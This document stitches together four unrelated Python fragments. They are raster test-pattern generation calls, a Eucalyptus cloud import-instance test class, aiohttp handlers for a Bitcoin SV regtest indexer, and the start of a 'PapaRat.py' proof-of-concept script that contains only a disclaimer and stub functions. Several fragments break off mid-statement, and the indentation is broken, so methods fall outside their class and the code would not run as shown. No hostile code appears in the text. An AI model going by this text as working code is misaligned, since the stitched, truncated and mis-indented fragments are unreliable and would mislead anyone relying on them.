array2rastercsv(tiltySlopeyArray(pxwidth, pxheight, max, min, "S"), '{0}AngledSlopey{1}-{2}{3}'.format(folder, min, max, "S"), templateRaster, topoffset, leftoffset)
array2rastercsv(tiltySlopeyArray(pxwidth, pxheight, max, min, "W"), '{0}AngledSlopey{1}-{2}{3}'.format(folder, min, max, "W"), templateRaster, topoffset, leftoffset)
array2rastercsv(squareHillArray(pxwidth, pxheight, max, min), '{0}SquareHill{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(squareHillArray(pxwidth, pxheight, min, max), '{0}SquareValley{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(sineArray(pxwidth, pxheight, max, min), '{0}SinWave{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(sineArray(pxwidth, pxheight, min, max), '{0}SinWaveInv{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(sineArray(pxwidth, pxheight, max, min, math.pi / 2), '{0}CosWave{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(sineArray(pxwidth, pxheight, min, max, math.pi / 2), '{0}CosWaveInv{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(sawtoothArray(pxwidth, pxheight, min, max), '{0}SawTooth{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(sawtoothArray(pxwidth, pxheight, max, min), '{0}SawToothInv{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(doubleSawtoothArray(pxwidth, pxheight, min, max), '{0}DoubleSawTooth{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(doubleSawtoothArray(pxwidth, pxheight, max, min), '{0}DoubleSawToothInv{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
if | |
#!/usr/bin/python
# Software License Agreement (BSD License)
#
# Copyright (c) 2009-2011, Eucalyptus Systems, Inc.
# All rights reserved.
#
# Redistribution and use of this software in source and binary forms, with or
# without modification, are permitted provided that the following conditions
# are met:
#
# Redistributions of source code must retain the above
# copyright notice, this list of conditions and the
# following disclaimer.
#
# Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other
# materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: <EMAIL>
#!/usr/bin/env python
from nephoria.testcase_utils.cli_test_runner import CliTestRunner, SkipTestException
from nephoria.testcases.euca2ools.euca2ools_image_utils import Euca2oolsImageUtils
from nephoria.usercontext import UserContext
from nephoria.testcontroller import TestController
from cloud_utils.log_utils import get_traceback, red
from cloud_utils.system_utils import local
from cloud_utils.net_utils.sshconnection import CommandExitCodeException
from boto.s3.bucket import Bucket
from boto.ec2.keypair import KeyPair
from boto.vpc.subnet import Subnet
from boto.exception import S3ResponseError
import copy
from nephoria.aws.ec2.conversiontask import ConversionTask
from subprocess import CalledProcessError
from urllib2 import Request, urlopen, URLError
from base64 import b64decode
import os
import re
import time
import types
class ImportInstanceTests(CliTestRunner):
    # Start from the base CliTestRunner CLI arguments and extend/override
    # them with the options specific to import-instance testing.
    _DEFAULT_CLI_ARGS = copy.copy(CliTestRunner._DEFAULT_CLI_ARGS)

    # --- Source image options ---
    _DEFAULT_CLI_ARGS['image_url'] = {
        'args': ['--image-url'],
        'kwargs': {'default': None,
                   'help': 'URL containing remote image to create import instance task from'}}
    _DEFAULT_CLI_ARGS['instanceuser'] = {
        'args': ['--instance-user'],
        'kwargs': {'dest': 'instance_user',
                   'default': None,
                   'help': 'Username used for ssh or winrm login ie: Linux:root '
                           'Windows:Administrator'}}
    # --- Worker machine (where image prep commands run) ---
    _DEFAULT_CLI_ARGS['workerip'] = {
        'args': ['--workerip'],
        'kwargs': {'dest': 'worker_machine',
                   'default': None,
                   'help': 'The ip/hostname of the machine that the operation will be performed '
                           'on'}}
    _DEFAULT_CLI_ARGS['worker_username'] = {
        'args': ['--worker-username'],
        'kwargs': {'dest': 'worker_username',
                   'default': 'root',
                   'help': 'The username of the machine that the operation will be performed on'}}
    _DEFAULT_CLI_ARGS['worker_password'] = {
        'args': ['--worker-password'],
        'kwargs': {'dest': 'worker_password',
                   'default': None,
                   'help': 'The password of the machine that the operation will be performed on'}}
    _DEFAULT_CLI_ARGS['worker_keypath'] = {
        'args': ['--worker-keypath'],
        'kwargs': {'dest': 'worker_keypath',
                   'default': None,
                   'help': 'The ssh keypath of the machine that the operation will be performed '
                           'on'}}
    _DEFAULT_CLI_ARGS['destpath'] = {
        'args': ['--destpath'],
        'kwargs': {'default': '/disk1/storage',
                   'help': 'The path on the workip that this operation will be performed on'}}
    _DEFAULT_CLI_ARGS['imagelocation'] = {
        'args': ['--imagelocation'],
        'kwargs': {'default': None,
                   'help': 'The file path on the worker of a pre-existing image to import'}}
    # --- Remote download credentials ---
    _DEFAULT_CLI_ARGS['urlpass'] = {
        'args': ['--urlpass'],
        'kwargs': {'dest': 'wget_password',
                   'default': None,
                   'help': 'Password needed to retrieve remote url'}}
    _DEFAULT_CLI_ARGS['urluser'] = {
        'args': ['--urluser'],
        'kwargs': {'dest': 'wget_user',
                   'default': None,
                   'help': 'Username needed to retrieve remote url'}}
    _DEFAULT_CLI_ARGS['gigtime'] = {
        'args': ['--gigtime'],
        'kwargs': {'dest': 'time_per_gig',
                   'default': 300,
                   'help': 'Time allowed per gig size of image to be used'}}
    # --- Import task parameters ---
    _DEFAULT_CLI_ARGS['virtualization_type'] = {
        'args': ['--virtualization-type'],
        'kwargs': {'default': 'hvm',
                   'help': 'virtualization type hvm or pv'}}
    _DEFAULT_CLI_ARGS['bucket'] = {
        'args': ['--bucket'],
        'kwargs': {'dest': 'bucketname',
                   'default': None,
                   'help': 'bucket name to be used for import task'}}
    _DEFAULT_CLI_ARGS['arch'] = {
        'args': ['--arch'],
        'kwargs': {'dest': 'arch',
                   'default': "x86_64",
                   'help': 'Image architecture ie:x86_64'}}
    _DEFAULT_CLI_ARGS['imageformat'] = {
        'args': ['--imageformat'],
        'kwargs': {'dest': 'imageformat',
                   'default': 'raw',
                   'help': 'image format for import task. ie vmdk raw vhd'}}
    _DEFAULT_CLI_ARGS['platform'] = {
        'args': ['--platform'],
        'kwargs': {'dest': 'platform',
                   'default': "Linux",
                   'help': 'Linux or Windows'}}
    _DEFAULT_CLI_ARGS['uploaded_manifest'] = {
        'args': ['--uploaded-manifest'],
        'kwargs': {'dest': 'upload_manifest',
                   'default': None,
                   'help': 'bucket/prefix location of manifest to register'}}
    _DEFAULT_CLI_ARGS['bundle_manifest'] = {
        'args': ['--bundle-manifest'],
        'kwargs': {'dest': 'bundle_manifest',
                   'default': None,
                   'help': 'file path on worker to bundle manifest to upload'}}
    _DEFAULT_CLI_ARGS['overwrite'] = {
        'args': ['--overwrite'],
        'kwargs': {'action': 'store_true',
                   'default': False,
                   'help': 'Will overwrite files in matching work dir on worker machine if found'}}
    # --- Timeouts ---
    _DEFAULT_CLI_ARGS['time_per_gig'] = {
        'args': ['--time-per-gig'],
        'kwargs': {'default': 100,
                   'help': 'Time allowed (in addition to base timeout) per image size in GB '
                           'before timing out task. Default:100 seconds'}}
    _DEFAULT_CLI_ARGS['base_timeout'] = {
        'args': ['--base-timeout'],
        'kwargs': {'default': 600,
                   'help': 'Base timeout value prior to adding time per gig of image size'}}
    _DEFAULT_CLI_ARGS['task_user_data'] = {
        'args': ['--task-user-data'],
        'kwargs': {'default': '#cloud-config\ndisable_root: false',
                   'help': 'user data to provide to import instance task request'}}
    # --- Misc behaviour flags ---
    _DEFAULT_CLI_ARGS['no_clean_on_exit'] = {
        'args': ['--no-clean-on-exit'],
        'kwargs': {'action': 'store_true',
                   'default': False,
                   'help': 'Disable cleanup method upon exit to leave test resources behind'}}
    _DEFAULT_CLI_ARGS['no_https'] = {
        'args': ['--no-https'],
        'kwargs': {'action': 'store_true',
                   'default': False,
                   'help': 'Use http instead of https'}}
    _DEFAULT_CLI_ARGS['subnet'] = {
        'args': ['--subnet'],
        'kwargs': {'dest': 'subnet',
                   'default': None,
                   'help': 'Subnet to use to create the instance network'}}
    # The base runner's --emi argument does not apply here.
    del _DEFAULT_CLI_ARGS['emi']
def post_init(self):
    """
    cli_test_runner method which runs after __init__().

    Normalizes CLI arguments (worker password fallback, platform casing,
    per-platform default login user) and initializes the backing fields used
    by this test's lazy properties.
    """
    # Fall back to the generic password when no worker password was provided.
    self.args.worker_password = self.args.worker_password or self.args.password
    # NOTE: the original had the no-op `self.args.worker_keypath =
    # self.args.worker_keypath` here; the fallback to self.args.keypair is
    # already handled by the worker_keypath property, so it was removed.
    # Format platform case sensitive arg.
    if str(self.args.platform).upper().strip() == "WINDOWS":
        self.args.platform = "Windows"
    elif str(self.args.platform).upper().strip() == "LINUX":
        self.args.platform = "Linux"
    if self.args.instance_user is None:
        # Default login user differs between Windows and Linux images.
        if self.args.platform == "Windows":
            self.args.instance_user = 'Administrator'
        else:
            self.args.instance_user = 'root'
    # Backing fields for lazily created resources/properties.
    self.latest_task_dict = None
    self._user = None
    self._tc = None
    self._image_utils = None
    self._bucket = None
    self._group = None
    self._imagelocation = None
    self._keypair = None
    self._subnet = None
    self._created_keypairs = []
    self._zone = None
    self.args_check = None
    self.current_task = None
@property
def imagelocation(self):
    """Source image location, resolved once and cached on this instance."""
    location = self._imagelocation
    if not location:
        location = self.get_source_volume_image()
        self._imagelocation = location
    return location
@property
def tc(self):
    """Lazily built TestController; requires --clc or --environment_file."""
    if self._tc:
        return self._tc
    if not (self.args.clc or self.args.environment_file):
        self.log.error('Must provide --clc or --environment_file arg to run this test')
        raise ValueError('Must provide --clc or --environment_file arg to run this test')
    try:
        self._tc = TestController(hostname=self.args.clc,
                                  environment_file=self.args.environment_file,
                                  password=self.args.password,
                                  clouduser_name=self.args.test_user,
                                  clouduser_account=self.args.test_account,
                                  log_level=self.args.log_level,
                                  https=(not self.args.no_https))
    except Exception as E:
        self.log.error("{0}\nError creating TestController obj:{1}"
                       .format(get_traceback(), E))
        raise E
    return self._tc
@property
def created_image(self):
    """ID of the image created by the most recent task, or None."""
    task_info = self.latest_task_dict or {}
    task = task_info.get('task')
    return getattr(task, 'id', None)
@property
def worker_password(self):
    """Password for the worker machine, defaulting to the generic password."""
    return self.args.worker_password or self.args.password
@property
def worker_keypath(self):
    """SSH key path for the worker machine, defaulting to the generic keypair."""
    return self.args.worker_keypath or self.args.keypair
@property
def image_utils(self):
    """Lazily built Euca2oolsImageUtils helper configured from the CLI args."""
    iu = getattr(self, '_image_utils', None)
    if iu is None:
        # Create an ImageUtils helper from the arguments provided in this testcase...
        setattr(self.args, 'worker_machine', self.tc.sysadmin.clc_machine)
        setattr(self.args, 'user_context', self.user)
        setattr(self.args, 'test_controller', self.tc)
        # (the original set 'user_context' twice; once is sufficient)
        iu = self.do_with_args(Euca2oolsImageUtils)
        setattr(self, '_image_utils', iu)
    return iu
@property
def user(self):
    """User context for API calls; a CLC/environment user wins over raw keys."""
    if self._user:
        return self._user
    if self.args.access_key and self.args.secret_key and self.args.region:
        self._user = UserContext(aws_access_key=self.args.access_key,
                                 aws_secret_key=self.args.secret_key,
                                 region=self.args.region)
    # Deliberately not an elif: when a TestController is reachable its user
    # context takes precedence over one built from raw credentials.
    if (self.args.clc or self.args.environment_file) and self.tc:
        self._user = self.tc.user
    return self._user
@property
def subnet(self):
    """Subnet resolved from the --subnet CLI arg, fetched once then cached."""
    if self._subnet is None and self.args.subnet:
        try:
            self._subnet = self.user.ec2.get_subnet(self.args.subnet)
        except Exception as E:
            self.log.error(red('{0}\nFailed to fetch CLI provided subnet:"{1}", ERR:"{2}"'
                               .format(get_traceback(), self.args.subnet, E)))
    return self._subnet
@subnet.setter
def subnet(self, subnet):
    """Accept None or a Subnet instance; anything else is logged and ignored."""
    if subnet is not None and not isinstance(subnet, Subnet):
        self.log.error(red('Unsupported type for subnet:{0}/{1}, must be None or type Subnet'
                           .format(subnet, type(subnet))))
    else:
        self._subnet = subnet
def check_url(self, url=None):
    """
    Verify that a URL is valid and reachable, retrying on transient failures.

    :param url: URL to check; defaults to self.args.image_url
    :raises AssertionError: if the URL is still unreachable after all retries
    """
    retries = 12
    retry_delay = 10
    # Bug fix: resolve the url parameter FIRST; the original built the Request
    # from self.args.image_url unconditionally, ignoring an explicit `url`.
    url = url or self.args.image_url
    req = Request(url)
    for x in range(retries + 1):
        try:
            urlopen(req)
            self.log.debug('URL: "{0}" is valid and reachable!'.format(url))
        # `except URLError as e` is valid Python 2.6+ and Python 3,
        # unlike the original `except URLError, e` form.
        except URLError as e:
            if x < retries:
                if hasattr(e, 'reason'):
                    self.log.debug('Retrying to resolve "{0}", and got: "{1}"'
                                   .format(url, e.reason))
                elif hasattr(e, 'code'):
                    self.log.debug('Retrying to resolve "{0}", and got: "{1}"'
                                   .format(url, e.code))
                time.sleep(retry_delay)
                continue
            else:
                if hasattr(e, 'reason'):
                    raise AssertionError('INVALID URL: "{0}", "{1}"'
                                         .format(url, e.reason))
                elif hasattr(e, 'code'):
                    raise AssertionError('INVALID REQUEST: "{0}", "{1}"'
                                         .format(url, e.code))
        break
@property
def bucket(self):
    """Bucket used for image-import artifacts; created on first access."""
    if self._bucket:
        return self._bucket
    bucketname = self.args.bucketname
    if not bucketname:
        # Derive a name from the image location/url, or from the platform.
        location = self.imagelocation or self.args.image_url
        if location:
            image_name = os.path.basename(location)[0:15]
        else:
            image_name = str(self.args.platform or 'test')
        bucketname = 'eutester_import_' + str(image_name).lower()
    self._bucket = self.user.s3.create_bucket(bucketname)
    return self._bucket
@bucket.setter
def bucket(self, value=None):
    """Accept None, a Bucket object, or a bucket name to fetch via S3."""
    if value is None or isinstance(value, Bucket):
        self._bucket = value
        return
    if isinstance(value, basestring):
        user = self.user
        assert isinstance(user, UserContext)
        try:
            self._bucket = self.user.s3.get_bucket(value)
        except S3ResponseError as SE:
            self.log.error('Error fetching bucket:"{0}", err:"{1}"'.format(value, SE))
            raise SE
        return
    raise ValueError('Unknown type for bucket: "{0}/{1}"'.format(value, type(value)))
@classmethod
def assertEquals(cls, x, y):
    """Assert that x equals y, with a descriptive failure message."""
    message = str(x) + ' is not equal to ' + str(y)
    assert x == y, message
@property
def keyname(self):
| |
from __future__ import annotations
from datetime import datetime, timedelta
import json
from typing import Any, cast, Dict, Optional, TYPE_CHECKING
import requests
from aiohttp import web
import logging
from bitcoinx import hex_str_to_hash, hash_to_hex_str
from electrumsv_node import electrumsv_node
from .constants import SERVER_HOST, SERVER_PORT
from . import sqlite_db
from .types import FILTER_RESPONSE_SIZE, filter_response_struct, IndexerPushdataRegistrationFlag, \
outpoint_struct, OutpointJSONType, output_spend_struct, OutpointType, \
RestorationFilterRequest, tip_filter_entry_struct, TipFilterRegistrationEntry, \
TipFilterRegistrationResponse, tsc_merkle_proof_json_to_binary, ZEROED_OUTPOINT
if TYPE_CHECKING:
from .server import ApplicationState
logger = logging.getLogger('handlers')
async def ping(request: web.Request) -> web.Response:
    """Liveness check endpoint; always answers with the literal text "true"."""
    body_text = "true"
    return web.Response(text=body_text)
async def error(request: web.Request) -> web.Response:
    """Deliberately failing endpoint used to exercise server error handling."""
    message = "This is a test of raising an exception in the handler"
    raise ValueError(message)
async def get_endpoints_data(request: web.Request) -> web.Response:
    """Describe the API endpoints this server exposes; valid for 24 hours."""
    now = datetime.utcnow()
    expiry = now + timedelta(days=1)
    endpoints = [
        {
            "apiType": "bsvapi.transaction",
            "apiVersion": 1,
            "baseURL": "/api/v1/transaction",
        },
        {
            "apiType": "bsvapi.merkle-proof",
            "apiVersion": 1,
            "baseURL": "/api/v1/merkle-proof",
        },
        {
            "apiType": "bsvapi.output-spend",
            "apiVersion": 1,
            "baseURL": "/api/v1/output-spend",
        },
        {
            "apiType": "bsvapi.restoration",
            "apiVersion": 1,
            "baseURL": "/api/v1/restoration",
            "pricing": {
                "data": {
                    "satoshis": 4524,
                    "bytes": 10000000,
                }
            }
        },
    ]
    data: Dict[str, Any] = {
        "apiType": "bsvapi.endpoints",
        "apiVersion": 1,
        "baseUrl": f"http://{SERVER_HOST}:{SERVER_PORT}",
        "timestamp": now.isoformat() + "Z",
        "expiryTime": expiry.isoformat() + "Z",
        "endpoints": endpoints,
    }
    return web.json_response(data=data)
async def get_restoration_matches(request: web.Request) -> web.StreamResponse:
    """
    Main endpoint for the rapid restoration API.

    Accepts a JSON body of the form ``{"filterKeys": ["<pushdata hash hex>", ...]}``
    and streams back index matches either as fixed-size packed binary records
    (Accept: application/octet-stream) or as newline-delimited JSON objects
    terminated by an empty ``{}`` object.
    """
    app_state: ApplicationState = request.app['app_state']
    # Default to JSON when the client does not express a preference.
    accept_type = request.headers.get("Accept", "*/*")
    if accept_type == "*/*":
        accept_type = "application/json"
    body = await request.content.read()
    if body:
        pushdata_hashes_hex: RestorationFilterRequest = \
            json.loads(body.decode('utf-8'))['filterKeys']
    else:
        # A request with no body is malformed.
        return web.Response(status=400)
    pushdata_hashes = [ bytes.fromhex(value) for value in pushdata_hashes_hex ]
    if accept_type == 'application/octet-stream':
        headers = {'Content-Type': 'application/octet-stream', 'User-Agent': 'SimpleIndexer'}
        response = web.StreamResponse(status=200, reason='OK', headers=headers)
        await response.prepare(request)
        # Binary mode: one packed struct per match, streamed as produced.
        result = sqlite_db.get_restoration_matches(app_state.database_context, pushdata_hashes,
            json=False)
        count = 0
        for match in result:
            packed_match = filter_response_struct.pack(*match)
            await response.write(packed_match)
            count += 1
        total_size = count * FILTER_RESPONSE_SIZE
        logger.debug(f"Total pushdata filter match response size: {total_size} for count: {count}")
    else:
        headers = {'Content-Type': 'application/json', 'User-Agent': 'SimpleIndexer'}
        response = web.StreamResponse(status=200, reason='OK', headers=headers)
        await response.prepare(request)
        result = sqlite_db.get_restoration_matches(app_state.database_context, pushdata_hashes,
            json=True)
        # JSON mode: newline-delimited objects; the trailing "{}" signals
        # end-of-stream to the client.
        for match in result:
            data = (json.dumps(match) + "\n").encode('utf-8')
            await response.write(data)
        await response.write(b"{}")
    return response
async def get_transaction(request: web.Request) -> web.Response:
    """Return the raw transaction for a txid, as binary or as JSON hex."""
    app_state: ApplicationState = request.app['app_state']
    # Binary output only when explicitly requested; everything else gets JSON.
    accept_header = request.headers.get("Accept", "*/*")
    wants_binary = accept_header == 'application/octet-stream'
    txid_hex = request.match_info['txid']
    if not txid_hex:
        return web.Response(status=400, reason="no txid provided")
    try:
        tx_hash = hex_str_to_hash(txid_hex)
    except ValueError:
        return web.Response(status=400, reason="invalid txid")
    rawtx = sqlite_db.get_transaction(app_state.database_context, tx_hash)
    if rawtx is None:
        return web.Response(status=404)
    if wants_binary:
        return web.Response(body=rawtx)
    return web.json_response(data=rawtx.hex())
async def get_merkle_proof(request: web.Request) -> web.Response:
    """
    Return a TSC merkle proof for the given txid.

    It is expected that a valid response will have a content length, and should stream the data
    if possible. This is to allow things like 4 GiB transactions to be provided within proof
    with no server overhead over providing both proof and transaction separately.

    This regtest implementation has to use the node to provide data via the JSON-RPC API and this
    will never be streamable or scalable. But professional services would be expected to design
    for streaming out of the box, and would not be encumbered by limitations imposed by the node.
    """
    # Todo - use the bitcoin node as much as possible (this is only for RegTest)
    app_state: ApplicationState = request.app['app_state']
    # Default to JSON when the client does not express a preference.
    accept_type = request.headers.get("Accept", "*/*")
    if accept_type == "*/*":
        accept_type = "application/json"
    txid = request.match_info['txid']
    if not txid:
        return web.Response(status=400, reason="no txid submitted")
    try:
        tx_hash = hex_str_to_hash(txid)
    except ValueError:
        return web.Response(status=400, reason="invalid txid")
    # Only transactions this indexer has seen mined can have a proof.
    block_hash = sqlite_db.get_block_hash_for_tx(app_state.database_context, tx_hash)
    if not block_hash:
        return web.Response(status=404)
    include_full_tx = request.query.get("includeFullTx") == "1"
    target_type = request.query.get("targetType", "hash")
    if target_type is not None and target_type not in {'hash', 'header', 'merkleroot'}:
        return web.Response(status=400)
    # Request TSC merkle proof from the node
    # Todo - binary format not currently supported by the node
    try:
        tsc_merkle_proof = electrumsv_node.call_any("getmerkleproof2",
            hash_to_hex_str(block_hash), txid, include_full_tx, target_type).json()['result']
        if accept_type == 'application/octet-stream':
            binary_response = tsc_merkle_proof_json_to_binary(tsc_merkle_proof,
                include_full_tx=include_full_tx, target_type=target_type)
            return web.Response(body=binary_response)
        else:
            return web.json_response(data=tsc_merkle_proof)
    except requests.exceptions.HTTPError as e:
        # the node does not return merkle proofs when there is only a single coinbase tx
        # in the block. It could be argued that this is a bug and it should return the same format.
        result = electrumsv_node.call_any("getrawtransaction", txid, 1).json()['result']
        rawtx = result['hex']
        blockhash = result['blockhash']
        result = electrumsv_node.call_any("getblock", blockhash).json()['result']
        num_tx = result['num_tx']
        if num_tx != 1:
            # More than one tx but no proof from the node: treat as not found.
            return web.Response(status=404)
        else:
            # Single-tx block: the coinbase IS the merkle root, so a proof
            # with an empty node list can be synthesized locally.
            merkleroot = result['merkleroot']
            assert merkleroot == txid
            txOrId = txid
            if include_full_tx:
                txOrId = rawtx
            if target_type == 'hash':
                target = blockhash
            elif target_type == 'header':
                target = electrumsv_node.call_any("getblockheader", blockhash,
                    False).json()['result']
            elif target_type == 'merkleroot':
                target = merkleroot
            else:
                target = blockhash
            tsc_merkle_proof = {
                'index': 0,
                'txOrId': txOrId,
                'target': target,
                'nodes': []
            }
            if accept_type == 'application/octet-stream':
                binary_response = tsc_merkle_proof_json_to_binary(tsc_merkle_proof,
                    include_full_tx=include_full_tx, target_type=target_type)
                return web.Response(body=binary_response)
            else:
                return web.json_response(data=tsc_merkle_proof)
async def post_output_spends(request: web.Request) -> web.Response:
    """
    Return the metadata for each provided outpoint if they are spent.
    """
    # Default to JSON when the client does not express a preference.
    accept_type = request.headers.get("Accept", "*/*")
    if accept_type == "*/*":
        accept_type = "application/json"
    content_type = request.headers.get('Content-Type')
    body = await request.content.read()
    if not body:
        raise web.HTTPBadRequest(reason="no body")
    client_outpoints: list[OutpointType] = []
    if content_type == 'application/json':
        # Convert the incoming JSON representation to the internal binary representation.
        client_outpoints_json: list[OutpointJSONType] = json.loads(body.decode('utf-8'))
        if not isinstance(client_outpoints_json, list):
            raise web.HTTPBadRequest(reason="payload is not a list")
        for entry in client_outpoints_json:
            # Each entry must be a [txid_hex, output_index] pair.
            if not isinstance(entry, list) or len(entry) != 2 or not isinstance(entry[1], int):
                raise web.HTTPBadRequest(reason="one or more payload entries are incorrect")
            try:
                tx_hash = hex_str_to_hash(entry[0])
            except (ValueError, TypeError):
                raise web.HTTPBadRequest(reason="one or more payload entries are incorrect")
            client_outpoints.append((tx_hash, entry[1]))
    elif content_type == 'application/octet-stream':
        raise web.HTTPBadRequest(reason="binary request body support not implemented yet")
    else:
        raise web.HTTPBadRequest(reason="unknown request body content type")
    app_state: ApplicationState = request.app['app_state']
    existing_rows = sqlite_db.get_spent_outpoints(app_state.database_context, client_outpoints)
    if accept_type == 'application/octet-stream':
        # Fixed-size packed records; a zeroed block hash means "not mined yet".
        result_bytes = b""
        for row in existing_rows:
            result_bytes += output_spend_struct.pack(row.out_tx_hash, row.out_idx,
                row.in_tx_hash, row.in_idx, row.block_hash if row.block_hash else bytes(32))
        return web.Response(body=result_bytes)
    else:
        json_list: list[tuple[str, int, str, int, Optional[str]]] = []
        for row in existing_rows:
            json_list.append((hash_to_hex_str(row.out_tx_hash), row.out_idx,
                hash_to_hex_str(row.in_tx_hash), row.in_idx,
                row.block_hash.hex() if row.block_hash else None))
        return web.json_response(data=json_list)
async def post_output_spend_notifications_register(request: web.Request) -> web.Response:
    """
    Register the caller provided UTXO references so that we send notifications if they get
    spent. We also return the current state for any that are known as a response.

    This is a bit clumsy, but this is the simple indexer and it is intended to be the minimum
    effort to allow ElectrumSV to be used against regtest. It is expected that the caller
    has connected to the notification web socket before making this call, and can keep up
    with the notifications.
    """
    # Default to JSON when the client does not express a preference.
    accept_type = request.headers.get("Accept", "*/*")
    if accept_type == "*/*":
        accept_type = "application/json"
    content_type = request.headers.get("Content-Type")
    body = await request.content.read()
    if not body:
        raise web.HTTPBadRequest(reason="no body")
    client_outpoints: list[OutpointType] = []
    if content_type == 'application/json':
        # Convert the incoming JSON representation to the internal binary representation.
        client_outpoints_json: list[OutpointJSONType] = json.loads(body.decode('utf-8'))
        if not isinstance(client_outpoints_json, list):
            raise web.HTTPBadRequest(reason="payload is not a list")
        for entry in client_outpoints_json:
            # Each entry must be a [txid_hex, output_index] pair.
            if not isinstance(entry, list) or len(entry) != 2 or not isinstance(entry[1], int):
                raise web.HTTPBadRequest(reason="one or more payload entries are incorrect")
            try:
                tx_hash = hex_str_to_hash(entry[0])
            except (ValueError, TypeError):
                raise web.HTTPBadRequest(reason="one or more payload entries are incorrect")
            client_outpoints.append((tx_hash, entry[1]))
    elif content_type == 'application/octet-stream':
        # Binary bodies are a concatenation of fixed-size outpoint structs.
        if len(body) % outpoint_struct.size != 0:
            raise web.HTTPBadRequest(reason="binary request body malformed")
        for outpoint_index in range(len(body) // outpoint_struct.size):
            outpoint = cast(OutpointType,
                outpoint_struct.unpack_from(body, outpoint_index * outpoint_struct.size))
            client_outpoints.append(outpoint)
    else:
        raise web.HTTPBadRequest(reason="unknown request body content type")
    app_state: ApplicationState = request.app['app_state']
    synchronizer = app_state.blockchain_state_monitor_thread
    if synchronizer is None:
        raise web.HTTPServiceUnavailable(reason="error finding synchronizer")
    existing_rows = synchronizer.register_output_spend_notifications(client_outpoints)
    if accept_type == 'application/octet-stream':
        # Fixed-size packed records; a zeroed block hash means "not mined yet".
        result_bytes = b""
        for row in existing_rows:
            result_bytes += output_spend_struct.pack(row.out_tx_hash, row.out_idx,
                row.in_tx_hash, row.in_idx, row.block_hash if row.block_hash else bytes(32))
        return web.Response(body=result_bytes)
    else:
        json_list: list[tuple[str, int, str, int, Optional[str]]] = []
        for row in existing_rows:
            json_list.append((hash_to_hex_str(row.out_tx_hash), row.out_idx,
                hash_to_hex_str(row.in_tx_hash), row.in_idx,
                row.block_hash.hex() if row.block_hash else None))
        # Bug fix: pass the list directly. The original passed
        # json.dumps(json_list), which double-encoded the payload into a JSON
        # string, inconsistent with the sibling post_output_spends handler.
        return web.json_response(data=json_list)
async def post_output_spend_notifications_unregister(request: web.Request) -> web.Response:
"""
This provides a way for the monitored output spends to be unregistered or cleared. It is
assumed that whomever has access to this endpoint, has control over the registration and
can do this on behalf of all users.
The reference server manages who is subscribed to what, and what should be monitored, and
uses this method to ensure the simple indexer is only monitoring what it needs to.
If the reference server wishes to clear all monitored output | |
# Repository: CosminStefanica/RatPack_PapaRat
"""
Copyright (C) 2017 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import serial
import time
import subprocess
import signal
import os
import binascii
import datetime
def print_license():
    """Print the no-warranty / proof-of-concept usage disclaimer."""
    disclaimer_lines = (
        "PapaRat.py Copyright (C) 2018 RatPack.inc",
        "This program comes with ABSOLUTELY NO WARRANTY.",
        "This is free software, and you are welcome to redistribute it",
        "under certain conditions. This program's intended use is strictly",
        "as a proof of concept and shall not be under any circumstances used",
        "to cause any damage or harm to any third parties.",
        "FOR TESTING PURPOSES ONLY!",
    )
    print("\n".join(disclaimer_lines))
def test_serial_interface():
    """Stub: serial-interface self-test is not implemented; always False."""
    return False
def log():
    """Stub: logging is not implemented; always returns False."""
    return False
def bash_roulette():
    """Stub: not implemented; always returns False."""
    return False
def authenticate(sent_message=''):
    """
    Stub authentication hook; currently accepts every message.

    Uses the print() function form (valid in both Python 2 and 3 for a single
    argument) instead of the original Python-2-only print statement.
    """
    print('authenticate started')
    return True
def chunks(text, length):
    """Yield successive `length`-character chunks from `text`."""
    for offset in range(0, len(text), length):
        yield text[offset:offset + length]
